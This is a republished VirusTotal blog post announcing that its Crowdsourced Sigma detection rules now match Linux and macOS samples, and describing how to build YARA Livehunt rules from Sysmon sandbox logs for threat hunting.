TLDR: VT Crowdsourced Sigma rules will now also match suspicious activity for macOS and Linux binaries, in addition to Windows.
We recently discussed how to maximize the value of Sigma rules by easily converting them to YARA Livehunts.
At that time Sigma rules were only matched against Windows binaries.
Our engineering team worked hard to provide a better experience to Sigma lovers, increasing Crowdsourced Sigma rules value by extending matches to macOS and Linux samples.
Although we are still working to implement Sysmon in our Linux and macOS sandboxes, we implemented new features that allow Sigma rule matching by extracting samples' runtime behavior.
We have mapped all the fields used by Sigma rules with the information offered by our sandboxes, which allowed us to map rules for image load, process creation and registry set, among others.
About 54% of Crowdsourced Sigma rules for Linux and 96% for macOS are related to process creation, meaning we already have enough information to match all these with our sandboxes' output.
The following shell script sample matches 11 Crowdsourced Sigma Rule matches.
Interestingly, Sigma rules intended for Linux also produce results in macOS environments, and vice versa.
The new feature matching Sigma rules with Linux and macOS samples helped us identify some rules that are maybe too generic, which is not necessarily a problem as long as this is the intended behavior.
The rule seems a bit too generic since it only checks for a few strings in the command line, although it can be highly effective for generic detection of suspicious behavior.
This sigma rule had about 9k hits last year only, with more than 300 of the files being Linux or macOS samples.
Now let's see how it is possible to create a Livehunt rule based on Sysmon logs.
The sample we will use in this example is associated with CobaltStrike and matches multiple Sigma rules that identify certain behaviors.
From the sample's JSON Structure, Sigma analysis results is an array that contains objects with all the relevant information related to the matching Sigma rules, including details about the rule itself and EVTX logs.
As explained in our post, by just clicking on the fields that you are interested in you can start building your Livehunt rule, and adjust values accordingly.
Some of the details found in Sysmon EVTX fields can be redundant with details provided in other more traditional fields that you use for your Livehunt rules through the YARA VT module.
At VirusTotal, we believe that the Sigma language is a valuable tool for the community to share information about samples' behavior.
Remember that here you have a list of all the Crowdsourced Sigma rules that are currently deployed in VirusTotal and that you can use for threat hunting.
We hope you join our fan club of Sigma and VirusTotal, and as always we are happy to hear your feedback.
This Cyber News was published on blog.virustotal.com. Publication date: Wed, 20 Dec 2023 12:43:05 +0000